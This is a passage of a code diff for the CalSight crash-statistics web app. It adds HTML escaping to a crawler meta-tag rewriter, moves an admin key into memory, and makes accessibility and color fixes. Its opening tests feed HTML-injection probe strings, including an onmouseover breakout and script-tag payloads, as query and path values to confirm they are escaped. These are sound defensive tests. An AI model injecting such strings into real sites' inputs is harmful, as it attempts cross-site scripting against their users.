+    const out = rewriteHtml(SAMPLE_HTML, buildContext(url));
+    expect(out).not.toContain(`" onmouseover="`);
+    expect(out).toContain("&quot; onmouseover=&quot;");
+  });
+
+  it("inserts $-sequences literally instead of as replacement patterns", () => {
+    const url = new URL(`https://calsight.org/stats?counties=${encodeURIComponent("$&$'kern$`")}`);
+    const out = rewriteHtml(SAMPLE_HTML, buildContext(url));
+    // "$&" would re-insert the matched tag and "$'" the trailing string if a
+    // string replacement pattern were used; with a replacer function they
+    // survive verbatim (HTML-escaped).
+    expect(out).toContain("$&amp;$&#39;kern$`");
+    // The original placeholder must have been replaced exactly once, not
+    // duplicated by pattern expansion.
+    expect(out.match(/<meta name="description"/g)).toHaveLength(1);
+  });
+
+  it("URL-encodes user values placed into the og:image query string", () => {
+    const url = new URL(
+      `https://calsight.org/stats?counties=${encodeURIComponent(`kern&evil="><img>`)}`,
+    );
+    const ctx = buildContext(url);
+    // URLSearchParams percent-encodes the raw value in the OG worker URL...
+    expect(ctx.ogImage).toContain("counties=kern%26evil%3D%22%3E%3Cimg%3E");
+    // ...so the interpolated attribute contains no raw markup.
+    const out = rewriteHtml(SAMPLE_HTML, ctx);
+    expect(out).not.toContain("<img>");
+  });
+
+  it("escapes the canonical URL derived from the request path", () => {
+    const url = new URL(`https://calsight.org/stats%22%3E%3Cscript%3E`);
+    const out = rewriteHtml(SAMPLE_HTML, buildContext(url));
+    expect(out).not.toContain("<script>");
+  });
+
+  it("still produces the expected tags for a normal request", () => {
+    const url = new URL("https://calsight.org/stats?preset=dui&counties=kern,los-angeles");
+    const out = rewriteHtml(SAMPLE_HTML, buildContext(url));
+    expect(out).toContain("<title>DUI Deep Dive Dashboard — CalSight</title>");
+    expect(out).toContain(`<meta name="description" content="California crash statistics for kern, los angeles.`);
+    expect(out).toContain(`<meta property="og:type" content="article"`);
+    expect(out).toContain(`<link rel="canonical" href="https://calsight.org/stats" />`);
+  });
+});

--- a/frontend/functions/_middleware.ts
+++ b/frontend/functions/_middleware.ts
@@ -52,7 +52,22 @@ function isCrawler(userAgent: string): boolean {
   return CRAWLER_USER_AGENTS.some((bot) => ua.includes(bot.toLowerCase()));
 }
 
-function buildContext(url: URL): CrawlerContext {
+/**
+ * Escape a value for interpolation into an HTML attribute (or text node).
+ * User-controlled query params (counties, preset, …) flow into the rewritten
+ * meta tags, so every interpolated value must be escaped to prevent HTML
+ * injection. Exported for tests.
+ */
+export function escapeHtmlAttr(value: string): string {
+  return value
+    .replace(/&/g, "&amp;")
+    .replace(/</g, "&lt;")
+    .replace(/>/g, "&gt;")
+    .replace(/"/g, "&quot;")
+    .replace(/'/g, "&#39;");
+}
+
+export function buildContext(url: URL): CrawlerContext {
   const pathname = url.pathname;
   const params = url.searchParams;
 
@@ -112,68 +127,77 @@ function buildContext(url: URL): CrawlerContext {
   return base;
 }
 
-function rewriteHtml(html: string, ctx: CrawlerContext): string {
+export function rewriteHtml(html: string, ctx: CrawlerContext): string {
+  // Escape every interpolated value once, up front. All replacements below
+  // use a function replacer so `$` sequences in user-influenced values are
+  // inserted literally instead of being interpreted as replacement patterns.
+  const title = escapeHtmlAttr(ctx.title);
+  const description = escapeHtmlAttr(ctx.description);
+  const ogImage = escapeHtmlAttr(ctx.ogImage);
+  const ogType = escapeHtmlAttr(ctx.ogType);
+  const canonicalUrl = escapeHtmlAttr(ctx.canonicalUrl);
+
   // Replace existing meta tags with dynamic values
   let result = html;
 
   // Title
   result = result.replace(
     /<title>[^<]*<\/title>/,
-    `<title>${ctx.title}</title>`
+    () => `<title>${title}</title>`
   );
 
   // Description
   result = result.replace(
     /<meta name="description" content="[^"]*"/,
-    `<meta name="description" content="${ctx.description}"`
+    () => `<meta name="description" content="${description}"`
   );
 
   // OG tags
   result = result.replace(
     /<meta property="og:title" content="[^"]*"/,
-    `<meta property="og:title" content="${ctx.title}"`
+    () => `<meta property="og:title" content="${title}"`
   );
   result = result.replace(
     /<meta property="og:description" content="[^"]*"/,
-    `<meta property="og:description" content="${ctx.description}"`
+    () => `<meta property="og:description" content="${description}"`
   );
   result = result.replace(
     /<meta property="og:image" content="[^"]*"/,
-    `<meta property="og:image" content="${ctx.ogImage}"`
+    () => `<meta property="og:image" content="${ogImage}"`
   );
   result = result.replace(
     /<meta property="og:type" content="[^"]*"/,
-    `<meta property="og:type" content="${ctx.ogType}"`
+    () => `<meta property="og:type" content="${ogType}"`
   );
 
   // Twitter tags
   result = result.replace(
     /<meta name="twitter:card" content="[^"]*"/,
-    `<meta name="twitter:card" content="summary_large_image"`
+    () => `<meta name="twitter:card" content="summary_large_image"`
   );
   result = result.replace(
     /<meta name="twitter:title" content="[^"]*"/,
-    `<meta name="twitter:title" content="${ctx.title}"`
+    () => `<meta name="twitter:title" content="${title}"`
   );
   result = result.replace(
     /<meta name="twitter:description" content="[^"]*"/,
-    `<meta name="twitter:description" content="${ctx.description}"`
+    () => `<meta name="twitter:description" content="${description}"`
   );
   result = result.replace(
     /<meta name="twitter:image" content="[^"]*"/,
-    `<meta name="twitter:image" content="${ctx.ogImage}"`
+    () => `<meta name="twitter:image" content="${ogImage}"`
   );
 
   // Inject canonical URL and additional OG tags after <title>
   const additionalTags = `
-    <meta property="og:url" content="${ctx.canonicalUrl}" />
+    <meta property="og:url" content="${canonicalUrl}" />
     <meta property="og:image:width" content="1200" />
     <meta property="og:image:height" content="630" />
     <meta property="og:site_name" content="CalSight" />
-    <meta name="twitter:image:alt" content="${ctx.title} — dashboard preview" />
-    <link rel="canonical" href="${ctx.canonicalUrl}" />`;
+    <meta name="twitter:image:alt" content="${title} — dashboard preview" />
+    <link rel="canonical" href="${canonicalUrl}" />`;
 
-  result = result.replace("</title>", `</title>${additionalTags}`);
+  result = result.replace("</title>", () => `</title>${additionalTags}`);
 
   return result;
 }

--- a/frontend/src/App.tsx
+++ b/frontend/src/App.tsx
@@ -18,6 +18,7 @@ import AdminGuard from "./components/AdminGuard";
 import MaintenanceGate from "./components/MaintenanceGate";
 import RebuildingBanner from "./components/RebuildingBanner";
 import { AiCompanionProvider } from "./components/ai/AiCompanion";
+import { AskAiProvider } from "./hooks/useAskAi";
 
 const MapPage = lazy(() => import("./pages/MapPage"));
 const StatsPage = lazy(() => import("./pages/StatsPage"));
@@ -55,6 +56,7 @@ export default function App() {
           <MaintenanceGate />
           <RebuildingBanner />
           <BrowserRouter>
+          <AskAiProvider>
           <AiCompanionProvider>
           <Suspense fallback={<div className="flex items-center justify-center h-dvh" role="status" aria-label="Loading page"><span className="inline-block w-6 h-6 border-2 border-primary border-t-transparent rounded-full animate-spin" aria-hidden="true" /><span className="sr-only">Loading page</span></div>}>
             <Routes>
@@ -70,6 +72,7 @@ export default function App() {
             </Routes>
           </Suspense>
           </AiCompanionProvider>
+          </AskAiProvider>
           </BrowserRouter>
           </AccessibilityProvider>
         </LiteModeProvider>

--- a/frontend/src/components/AdminGuard.tsx
+++ b/frontend/src/components/AdminGuard.tsx
@@ -1,21 +1,37 @@
 import { useState, useCallback, useEffect, useRef } from "react";
-import { safeGetItem, safeSetItem } from "../lib/safeStorage";
+import { safeRemoveItem } from "../lib/safeStorage";
+import { getAdminKey, setAdminKey, ADMIN_KEY_CLEARED_EVENT } from "../lib/adminKey";
 import { API_BASE } from "../config";
 
-const STORAGE_KEY = "calsight-admin-authenticated";
+/** Old boolean flag from a previous version — never grants access anymore. */
+const LEGACY_STORAGE_KEY = "calsight-admin-authenticated";
 
 /**
- * Route guard for admin pages. Stores only a boolean flag in localStorage
- * (never the actual key) to remember authentication state across sessions.
+ * Route guard for admin pages. On successful verification the admin key is
+ * kept in sessionStorage (so it dies with the tab, unlike localStorage) and
+ * attached to /api/etl/* requests as the X-ETL-API-Key header. When the
+ * backend rejects the key (403), the stored key is cleared and this guard
+ * drops back to the locked state.
  */
 export default function AdminGuard({ children }: { children: React.ReactNode }) {
-  const [authenticated, setAuthenticated] = useState(() => {
-    return safeGetItem(STORAGE_KEY) === "true";
-  });
+  const [authenticated, setAuthenticated] = useState(() => getAdminKey() !== null);
   const [password, setPassword] = useState("");
   const [error, setError] = useState("");
   const [loading, setLoading] = useState(false);
   const inputRef = useRef<HTMLInputElement>(null);
+
+  // Migrate away from the legacy localStorage boolean: it only recorded that
+  // a key was once verified, without the key itself, so it cannot be trusted.
+  useEffect(() => {
+    safeRemoveItem(LEGACY_STORAGE_KEY);
+  }, []);
+
+  // Re-lock when the stored key is cleared (e.g. an ETL request came back 403).
+  useEffect(() => {
+    const onCleared = () => setAuthenticated(false);
+    window.addEventListener(ADMIN_KEY_CLEARED_EVENT, onCleared);
+    return () => window.removeEventListener(ADMIN_KEY_CLEARED_EVENT, onCleared);
+  }, []);
 
   useEffect(() => {
     if (!authenticated) {
@@ -35,7 +51,8 @@ export default function AdminGuard({ children }: { children: React.ReactNode }) 
         body: JSON.stringify({ key: password }),
       });
       if (res.ok) {
-        safeSetItem(STORAGE_KEY, "true");
+        setAdminKey(password);
+        setPassword("");
         setAuthenticated(true);
       } else {
         const data = await res.json().catch(() => null);

--- a/frontend/src/components/AdminGuard.tsx
+++ b/frontend/src/components/AdminGuard.tsx
@@ -8,10 +8,10 @@ const LEGACY_STORAGE_KEY = "calsight-admin-authenticated";
 
 /**
  * Route guard for admin pages. On successful verification the admin key is
- * kept in sessionStorage (so it dies with the tab, unlike localStorage) and
- * attached to /api/etl/* requests as the X-ETL-API-Key header. When the
- * backend rejects the key (403), the stored key is cleared and this guard
- * drops back to the locked state.
+ * kept in memory (never web storage — see lib/adminKey) and attached to
+ * /api/etl/* requests as the X-ETL-API-Key header. When the backend rejects
+ * the key (403), the key is cleared and this guard drops back to the locked
+ * state. A full page reload drops the in-memory key and re-prompts.
  */
 export default function AdminGuard({ children }: { children: React.ReactNode }) {
   const [authenticated, setAuthenticated] = useState(() => getAdminKey() !== null);

--- a/frontend/src/components/ai/AiCompanion.test.tsx
+++ b/frontend/src/components/ai/AiCompanion.test.tsx
@@ -6,6 +6,7 @@ vi.mock("../../hooks/useDistribution", () => ({
 }));
 import { MemoryRouter } from "react-router-dom";
 import { AiCompanionProvider, useAiCompanion } from "./AiCompanion";
+import { AskAiProvider } from "../../hooks/useAskAi";
 import type { DataContext } from "../../lib/ai/dataContext";
 
 const filters = {
@@ -22,7 +23,7 @@ function Trigger() {
 
 describe("AiCompanion", () => {
   it("opens on demand and shows the instant explanation", () => {
-    render(<MemoryRouter><AiCompanionProvider><Trigger /></AiCompanionProvider></MemoryRouter>);
+    render(<MemoryRouter><AskAiProvider><AiCompanionProvider><Trigger /></AiCompanionProvider></AskAiProvider></MemoryRouter>);
     expect(screen.queryByRole("dialog")).toBeNull();
     fireEvent.click(screen.getByText("explain"));
     const dialog = screen.getByRole("dialog", { name: "AI explanation" });
@@ -31,7 +32,7 @@ describe("AiCompanion", () => {
   });
 
   it("closes on Escape", () => {
-    render(<MemoryRouter><AiCompanionProvider><Trigger /></AiCompanionProvider></MemoryRouter>);
+    render(<MemoryRouter><AskAiProvider><AiCompanionProvider><Trigger /></AiCompanionProvider></AskAiProvider></MemoryRouter>);
     fireEvent.click(screen.getByText("explain"));
     fireEvent.keyDown(document, { key: "Escape" });
     expect(screen.queryByRole("dialog")).toBeNull();

--- a/frontend/src/components/ai/AiCompanion.tsx
+++ b/frontend/src/components/ai/AiCompanion.tsx
@@ -32,7 +32,18 @@ const Ctx = createContext<CompanionApi | null>(null);
 export function AiCompanionProvider({ children }: { children: ReactNode }) {
   const [current, setCurrent] = useState<DataContext | null>(null);
   const [askedHere, setAskedHere] = useState(false);
-  const { sendMessage, isLoading, error, retry, messages } = useAskAi();
+  const { sendMessage, isLoading, error, retry, messages, cooldownEnd } = useAskAi();
+
+  // Mirror the Ask AI page: tick down the send cooldown so "Go deeper" is
+  // disabled while the server backoff (or the local per-question cooldown)
+  // is still active.
+  const [cooldownRemaining, setCooldownRemaining] = useState(0);
+  useEffect(() => {
+    const update = () => setCooldownRemaining(Math.max(0, Math.ceil(((cooldownEnd || 0) - Date.now()) / 1000)));
+    update();
+    const interval = setInterval(update, 500);
+    return () => clearInterval(interval);
+  }, [cooldownEnd]);
 
   const open = useCallback((ctx: DataContext) => setCurrent(ctx), []);
   const close = useCallback(() => setCurrent(null), []);
@@ -129,11 +140,16 @@ export function AiCompanionProvider({ children }: { children: ReactNode }) {
           </div>
           <p className="mt-2 text-sm text-on-surface-variant">{explanation.body}</p>
           <button
-            onClick={() => { if (current) { setAskedHere(true); sendMessage(buildDeepDivePrompt(current)); } }}
-            disabled={isLoading}
+            onClick={() => {
+              if (current && !isLoading && cooldownRemaining === 0) {
+                setAskedHere(true);
+                sendMessage(buildDeepDivePrompt(current));
+              }
+            }}
+            disabled={isLoading || cooldownRemaining > 0}
             className="mt-3 rounded-md bg-primary px-3 py-1.5 text-xs font-semibold text-on-primary disabled:opacity-50"
           >
-            {isLoading ? "Thinking…" : "Go deeper with AI"}
+            {isLoading ? "Thinking…" : cooldownRemaining > 0 ? `Wait ${cooldownRemaining}s` : "Go deeper with AI"}
           </button>
           {askedHere && (
             <div aria-live="polite" className="mt-3 max-h-[40vh] overflow-y-auto border-t border-outline-variant pt-3">

--- a/frontend/src/components/ai/Explainable.test.tsx
+++ b/frontend/src/components/ai/Explainable.test.tsx
@@ -6,6 +6,7 @@ vi.mock("../../hooks/useDistribution", () => ({
 }));
 import { MemoryRouter } from "react-router-dom";
 import { AiCompanionProvider } from "./AiCompanion";
+import { AskAiProvider } from "../../hooks/useAskAi";
 import { Explainable } from "./Explainable";
 import type { DataContext } from "../../lib/ai/dataContext";
 
@@ -19,9 +20,11 @@ const ctx: DataContext = { kind: "chart", label: "Crashes by hour", series: [{ l
 function setup() {
   render(
     <MemoryRouter>
-      <AiCompanionProvider>
-        <Explainable context={ctx}><span>9</span></Explainable>
-      </AiCompanionProvider>
+      <AskAiProvider>
+        <AiCompanionProvider>
+          <Explainable context={ctx}><span>9</span></Explainable>
+        </AiCompanionProvider>
+      </AskAiProvider>
     </MemoryRouter>,
   );
 }

--- a/frontend/src/components/map/ChoroplethLegend.tsx
+++ b/frontend/src/components/map/ChoroplethLegend.tsx
@@ -4,6 +4,7 @@ import { MEASURES } from "../../lib/choropleth/measures";
 import { getPalette, type PaletteKey } from "../../lib/choropleth/palettes";
 import { useIsDark } from "../../context/ThemeContext";
 import { useDesignTokens } from "../../hooks/useDesignTokens";
+import { getMapSeverityColors } from "../../lib/theme/tokens";
 
 
 const MISMATCH_DOT_COLORS: Record<PaletteKey, string> = {
@@ -73,6 +74,8 @@ export default function ChoroplethLegend({ demographicsAvailable, dataSummary = 
   if (!choroplethOn && !countyActive) return null;
 
   const colors = getPalette(palette, isDark);
+  // Same severity colors CrashDotLayer uses, so the legend matches the dots.
+  const severityColors = getMapSeverityColors(palette, isDark, tokens.severity);
   const activeMeasure = MEASURES[measure];
   const allMeasures = Object.values(MEASURES);
 
@@ -180,15 +183,15 @@ export default function ChoroplethLegend({ demographicsAvailable, dataSummary = 
             <span className="text-[10px] text-on-surface-variant font-semibold">Crash</span>
           </div>
           <div className="flex items-center gap-1.5">
-            <span className="inline-block w-2.5 h-2.5 rounded-full" style={{ backgroundColor: tokens.severity.fatal }} />
+            <span className="inline-block w-2.5 h-2.5 rounded-full" style={{ backgroundColor: severityColors.fatal }} />
             <span className="text-[10px] text-on-surface-variant font-semibold">Fatal</span>
           </div>
           <div className="flex items-center gap-1.5">
-            <span className="inline-block w-2.5 h-2.5 rounded-full" style={{ backgroundColor: tokens.severity.injury }} />
+            <span className="inline-block w-2.5 h-2.5 rounded-full" style={{ backgroundColor: severityColors.injury }} />
             <span className="text-[10px] text-on-surface-variant font-semibold">Injury</span>
           </div>
           <div className="flex items-center gap-1.5">
-            <span className="inline-block w-2.5 h-2.5 rounded-full" style={{ backgroundColor: tokens.severity.pdo }} />
+            <span className="inline-block w-2.5 h-2.5 rounded-full" style={{ backgroundColor: severityColors.pdo }} />
             <span className="text-[10px] text-on-surface-variant font-semibold" title="Property Damage Only">PDO</span>
           </div>
           {mismatchCount != null && mismatchCount > 0 && (

--- a/frontend/src/components/map/CrashDotLayer.tsx
+++ b/frontend/src/components/map/CrashDotLayer.tsx
@@ -5,6 +5,7 @@ import type { PaletteKey } from "../../lib/choropleth/palettes";
 import { useIsDark } from "../../context/ThemeContext";
 import { useLiteMode } from "../../context/LiteModeContext";
 import { useDesignTokens } from "../../hooks/useDesignTokens";
+import { getMapSeverityColors } from "../../lib/theme/tokens";
 
 interface CrashDotLayerProps {
   points: HeatmapPoint[];
@@ -37,12 +38,14 @@ function formatCause(cause: string | null | undefined): string {
 
 const MIN_ZOOM = 14;
 
-export default memo(function CrashDotLayer({ points, enabled }: CrashDotLayerProps) {
+export default memo(function CrashDotLayer({ points, enabled, palette }: CrashDotLayerProps) {
   const map = useMap();
   const isDark = useIsDark();
   const { isLite } = useLiteMode();
   const tokens = useDesignTokens();
-  const dotColors: DotColors = tokens.severity;
+  // Severity colors follow the map palette selected in the Layers panel, so
+  // e.g. the colorblind-safe palette reaches the dots (see getMapSeverityColors).
+  const dotColors: DotColors = getMapSeverityColors(palette, isDark, tokens.severity);
   const [zoom, setZoom] = useState(map.getZoom());
   const [center, setCenter] = useState(map.getCenter());
   const maxDots = isLite ? 400 : 800;

--- a/frontend/src/components/map/HighwaySidePanelContent.test.tsx
+++ b/frontend/src/components/map/HighwaySidePanelContent.test.tsx
@@ -7,6 +7,7 @@ vi.mock("../../hooks/useDistribution", () => ({
 
 import { MemoryRouter } from "react-router-dom";
 import { AiCompanionProvider } from "../ai/AiCompanion";
+import { AskAiProvider } from "../../hooks/useAskAi";
 import HighwaySidePanelContent from "./HighwaySidePanelContent";
 import type { HighwayRow } from "../../hooks/useHighwayRankings";
 import type { FilterSnapshot } from "../../lib/ai/dataContext";
@@ -30,9 +31,11 @@ const emptyFilters: FilterSnapshot = {
 function renderPanel(row: HighwayRow = baseRow) {
   return render(
     <MemoryRouter>
-      <AiCompanionProvider>
-        <HighwaySidePanelContent row={row} filters={emptyFilters} />
-      </AiCompanionProvider>
+      <AskAiProvider>
+        <AiCompanionProvider>
+          <HighwaySidePanelContent row={row} filters={emptyFilters} />
+        </AiCompanionProvider>
+      </AskAiProvider>
     </MemoryRouter>,
   );
 }

--- a/frontend/src/components/map/LayersPanel.test.tsx
+++ b/frontend/src/components/map/LayersPanel.test.tsx
@@ -1,0 +1,73 @@
+import { describe, it, expect, beforeEach } from "vitest";
+import { render, screen, fireEvent } from "@testing-library/react";
+import { LayersStateProvider } from "../../hooks/useLayersState";
+import { ThemeProvider } from "../../context/ThemeContext";
+import { CustomThemeProvider } from "../../context/CustomThemeContext";
+import LayersPanel from "./LayersPanel";
+
+function Harness() {
+  return (
+    <ThemeProvider>
+      <CustomThemeProvider>
+        <LayersStateProvider>
+          <LayersPanel />
+        </LayersStateProvider>
+      </CustomThemeProvider>
+    </ThemeProvider>
+  );
+}
+
+describe("LayersPanel toggle accessibility", () => {
+  beforeEach(() => {
+    localStorage.clear();
+  });
+
+  it("exposes every layer toggle as a named switch", () => {
+    render(<Harness />);
+    for (const name of [
+      "Shade by Measure",
+      "Statewide",
+      "County Detail",
+      "Coord Mismatches",
+      "Hide River Crashes",
+      "Highway Danger",
+    ]) {
+      expect(screen.getByRole("switch", { name })).toBeInTheDocument();
+    }
+  });
+
+  it("reflects state via aria-checked and flips it on toggle", () => {
+    render(<Harness />);
+    const highway = screen.getByRole("switch", { name: "Highway Danger" });
+    expect(highway).toHaveAttribute("aria-checked", "false");
+    fireEvent.click(highway);
+    expect(highway).toHaveAttribute("aria-checked", "true");
+    fireEvent.click(highway);
+    expect(highway).toHaveAttribute("aria-checked", "false");
+  });
+
+  it("marks the sole active base layer as aria-disabled with an sr-only explanation", () => {
+    render(<Harness />);
+    // Defaults: choropleth on, statewide heatmap off — choropleth is locked.
+    const choropleth = screen.getByRole("switch", { name: "Shade by Measure" });
+    expect(choropleth).toHaveAttribute("aria-disabled", "true");
+    expect(choropleth).toHaveTextContent(/at least one base layer must be active/i);
+
+    // Clicking a locked toggle is a no-op.
+    fireEvent.click(choropleth);
+    expect(choropleth).toHaveAttribute("aria-checked", "true");
+  });
+
+  it("moves the lock to the statewide heatmap when it becomes the sole base layer", () => {
+    render(<Harness />);
+    const statewide = screen.getByRole("switch", { name: "Statewide" });
+    expect(statewide).not.toHaveAttribute("aria-disabled");
+    fireEvent.click(statewide);
+
+    expect(statewide).toHaveAttribute("aria-checked", "true");
+    expect(statewide).toHaveAttribute("aria-disabled", "true");
+    const choropleth = screen.getByRole("switch", { name: "Shade by Measure" });
+    expect(choropleth).toHaveAttribute("aria-checked", "false");
+    expect(choropleth).not.toHaveAttribute("aria-disabled");
+  });
+});

--- a/frontend/src/components/map/LayersPanel.tsx
+++ b/frontend/src/components/map/LayersPanel.tsx
@@ -14,11 +14,22 @@ const HIGHWAY_METRICS: { key: HighwaySort; label: string }[] = [
 interface ToggleProps {
   enabled: boolean;
   onToggle: () => void;
+  /** Accessible name — mirrors the visible row label next to the toggle. */
+  label: string;
+  /** When locked the toggle can't be flipped; announced via aria-disabled. */
+  locked?: boolean;
+  /** Screen-reader-only explanation of why the toggle is locked. */
+  lockedHint?: string;
 }
 
-function Toggle({ enabled, onToggle }: ToggleProps) {
+function Toggle({ enabled, onToggle, label, locked = false, lockedHint }: ToggleProps) {
   return (
     <button
+      type="button"
+      role="switch"
+      aria-checked={enabled}
+      aria-label={label}
+      aria-disabled={locked || undefined}
       onClick={onToggle}
       className={`w-8 h-4 rounded-full relative transition-colors ${
         enabled ? "bg-primary" : "bg-surface-container-high"
@@ -29,6 +40,7 @@ function Toggle({ enabled, onToggle }: ToggleProps) {
           enabled ? "right-0.5" : "left-0.5"
         }`}
       />
+      {locked && lockedHint && <span className="sr-only">{lockedHint}</span>}
     </button>
   );
 }
@@ -80,6 +92,9 @@ export default function LayersPanel() {
             <div className="relative">
               <Toggle
                 enabled={choroplethOn}
+                label="Shade by Measure"
+                locked={choroplethLocked}
+                lockedHint="At least one base layer must be active. Enable Statewide Heatmap first to turn this off."
                 onToggle={() => {
                   if (choroplethLocked) return;
                   const next = !choroplethOn;
@@ -89,6 +104,7 @@ export default function LayersPanel() {
               />
               {choroplethLocked && (
                 <span
+                  aria-hidden="true"
                   title="At least one base layer must be active"
                   className="absolute inset-0 cursor-not-allowed rounded-full"
                 />
@@ -121,6 +137,9 @@ export default function LayersPanel() {
             <div className="relative">
               <Toggle
                 enabled={otherLayers.heatmapStatewide}
+                label="Statewide"
+                locked={heatmapStatewideL}
+                lockedHint="At least one base layer must be active. Enable County Colors first to turn this off."
                 onToggle={() => {
                   if (heatmapStatewideL) return;
                   const next = !otherLayers.heatmapStatewide;
@@ -131,6 +150,7 @@ export default function LayersPanel() {
               />
               {heatmapStatewideL && (
                 <span
+                  aria-hidden="true"
                   title="At least one base layer must be active"
                   className="absolute inset-0 cursor-not-allowed rounded-full"
                 />
@@ -174,7 +194,7 @@ export default function LayersPanel() {
             <span className={`text-sm font-medium ${otherLayers.heatmapCounty ? "text-on-surface" : "text-on-surface-variant"}`}>
               County Detail
             </span>
-            <Toggle enabled={otherLayers.heatmapCounty} onToggle={() => toggleOtherLayer("heatmapCounty")} />
+            <Toggle enabled={otherLayers.heatmapCounty} label="County Detail" onToggle={() => toggleOtherLayer("heatmapCounty")} />
           </div>
           {otherLayers.heatmapCounty && (
             <p className="text-[10px] text-on-surface-variant leading-tight pl-1">
@@ -185,7 +205,7 @@ export default function LayersPanel() {
             <span className={`text-sm font-medium ${otherLayers.coordMismatches ? "text-on-surface" : "text-on-surface-variant"}`}>
               Coord Mismatches
             </span>
-            <Toggle enabled={otherLayers.coordMismatches} onToggle={() => toggleOtherLayer("coordMismatches")} />
+            <Toggle enabled={otherLayers.coordMismatches} label="Coord Mismatches" onToggle={() => toggleOtherLayer("coordMismatches")} />
           </div>
           {otherLayers.coordMismatches && (
             <p className="text-[10px] text-on-surface-variant leading-tight pl-1">
@@ -196,7 +216,7 @@ export default function LayersPanel() {
             <span className={`text-sm font-medium ${otherLayers.coordIncludeRivers ? "text-on-surface" : "text-on-surface-variant"}`}>
               Hide River Crashes
             </span>
-            <Toggle enabled={otherLayers.coordIncludeRivers} onToggle={() => toggleOtherLayer("coordIncludeRivers")} />
+            <Toggle enabled={otherLayers.coordIncludeRivers} label="Hide River Crashes" onToggle={() => toggleOtherLayer("coordIncludeRivers")} />
           </div>
           {otherLayers.coordIncludeRivers && (
             <p className="text-[10px] text-on-surface-variant leading-tight pl-1">
@@ -218,6 +238,7 @@ export default function LayersPanel() {
             </span>
             <Toggle
               enabled={otherLayers.highwayDanger}
+              label="Highway Danger"
               onToggle={() => toggleOtherLayer("highwayDanger")}
             />
           </div>

--- a/frontend/src/components/map/UnifiedSearchBar.test.tsx
+++ b/frontend/src/components/map/UnifiedSearchBar.test.tsx
@@ -1,0 +1,77 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { render, screen, fireEvent, within } from "@testing-library/react";
+import userEvent from "@testing-library/user-event";
+import UnifiedSearchBar from "./UnifiedSearchBar";
+
+// Avoid real network / debounce from the geocoder.
+vi.mock("../../hooks/useNominatim", () => ({
+  useNominatim: () => ({ results: [], loading: false }),
+}));
+
+const noop = () => {};
+
+function renderBar() {
+  return render(
+    <UnifiedSearchBar
+      map={null}
+      onSelectCounty={noop}
+      onSelectPlace={noop}
+      onGeolocate={noop}
+    />,
+  );
+}
+
+// Expand the desktop search bar and return its combobox input.
+async function openDesktop() {
+  renderBar();
+  await userEvent.click(screen.getByRole("button", { name: "Open search" }));
+  return screen.getByRole("combobox", { name: "Search counties, places, and addresses" });
+}
+
+describe("UnifiedSearchBar accessibility", () => {
+  beforeEach(() => localStorage.clear());
+
+  it("gives the input combobox semantics wired to the results listbox", async () => {
+    const input = await openDesktop();
+    expect(input).toHaveAttribute("aria-haspopup", "listbox");
+    expect(input).toHaveAttribute("aria-expanded", "false");
+
+    await userEvent.type(input, "alam");
+    const listbox = screen.getByRole("listbox", { name: "Search results" });
+    expect(input).toHaveAttribute("aria-expanded", "true");
+    expect(input).toHaveAttribute("aria-controls", listbox.id);
+  });
+
+  it("exposes aria-activedescendant for the highlighted result on ArrowDown", async () => {
+    const input = await openDesktop();
+    await userEvent.type(input, "alam");
+    expect(input).not.toHaveAttribute("aria-activedescendant");
+
+    fireEvent.keyDown(input, { key: "ArrowDown" });
+    const option = screen.getByRole("option", { name: /Alameda/ });
+    expect(option).toHaveAttribute("aria-selected", "true");
+    expect(input).toHaveAttribute("aria-activedescendant", option.id);
+  });
+
+  it("renders the result row and its favorite star as siblings, not nested", async () => {
+    localStorage.setItem(
+      "calsight-favorites",
+      JSON.stringify([{ name: "Home", lat: 37.8, lng: -122.3, county: "Alameda" }]),
+    );
+    await openDesktop();
+
+    const option = screen.getByRole("option", { name: /Home/ });
+    const star = screen.getByRole("button", { name: /Remove Home from favorites/ });
+    // A button inside a button is invalid HTML — they must be siblings.
+    expect(option.contains(star)).toBe(false);
+    expect(within(option).queryByRole("button")).toBeNull();
+  });
+
+  it("labels the geolocate and zoom icon buttons", () => {
+    renderBar();
+    expect(screen.getByRole("button", { name: "Zoom in" })).toHaveAttribute("type", "button");
+    expect(screen.getByRole("button", { name: "Zoom out" })).toBeInTheDocument();
+    // "My location" appears on both mobile and desktop control clusters.
+    expect(screen.getAllByRole("button", { name: "My location" }).length).toBeGreaterThan(0);
+  });
+});

--- a/frontend/src/components/map/UnifiedSearchBar.tsx
+++ b/frontend/src/components/map/UnifiedSearchBar.tsx
@@ -1,4 +1,4 @@
-import { useState, useEffect, useRef, useCallback } from "react";
+import { useState, useEffect, useRef, useCallback, useId } from "react";
 import type { Map as LeafletMap } from "leaflet";
 import { CA_COUNTIES } from "../../hooks/useFilterParams";
 import { useNominatim } from "../../hooks/useNominatim";
@@ -29,6 +29,10 @@ export default function UnifiedSearchBar({
   const inputRef = useRef<HTMLInputElement>(null);
   const containerRef = useRef<HTMLDivElement>(null);
   const mobileInputRef = useRef<HTMLInputElement>(null);
+  const baseId = useId();
+  const desktopListId = `${baseId}-d`;
+  const mobileListId = `${baseId}-m`;
+  const optionId = (listId: string, idx: number) => `${listId}-opt-${idx}`;
 
   const { favorites, addFavorite, removeFavorite, isFavorite } = useFavoriteLocations();
 
@@ -145,8 +149,14 @@ export default function UnifiedSearchBar({
 
   const renderResults = (isMobile: boolean) => {
     if (!expanded || allResults.length === 0) return null;
+    const listId = isMobile ? mobileListId : desktopListId;
     return (
-      <div className={`${isMobile ? "mt-1" : "mt-1.5"} bg-surface-container-lowest/95 backdrop-blur-md ghost-border rounded-2xl shadow-lg overflow-hidden max-h-72 overflow-y-auto`}>
+      <div
+        id={listId}
+        role="listbox"
+        aria-label="Search results"
+        className={`${isMobile ? "mt-1" : "mt-1.5"} bg-surface-container-lowest/95 backdrop-blur-md ghost-border rounded-2xl shadow-lg overflow-hidden max-h-72 overflow-y-auto`}
+      >
         {showFavorites && (
           <div className="px-4 pt-3 pb-1">
             <span className="text-[10px] font-bold uppercase tracking-widest text-on-surface-variant">Favorites</span>
@@ -166,37 +176,49 @@ export default function UnifiedSearchBar({
                 </span>
               </div>
             )}
-            <button
-              onClick={() => handleSelect(item)}
-              className={`w-full flex items-center gap-3 px-4 py-2.5 text-sm text-left transition-colors ${
+            <div
+              className={`w-full flex items-center gap-3 px-4 py-2.5 text-sm transition-colors ${
                 idx === highlightIdx ? "bg-primary-container text-on-primary-container" : "text-on-surface hover:bg-surface-container"
               }`}
             >
-              <span className="material-symbols-outlined text-[16px] text-on-surface-variant shrink-0">
-                {iconForType(item.type)}
-              </span>
-              <div className="flex-1 min-w-0">
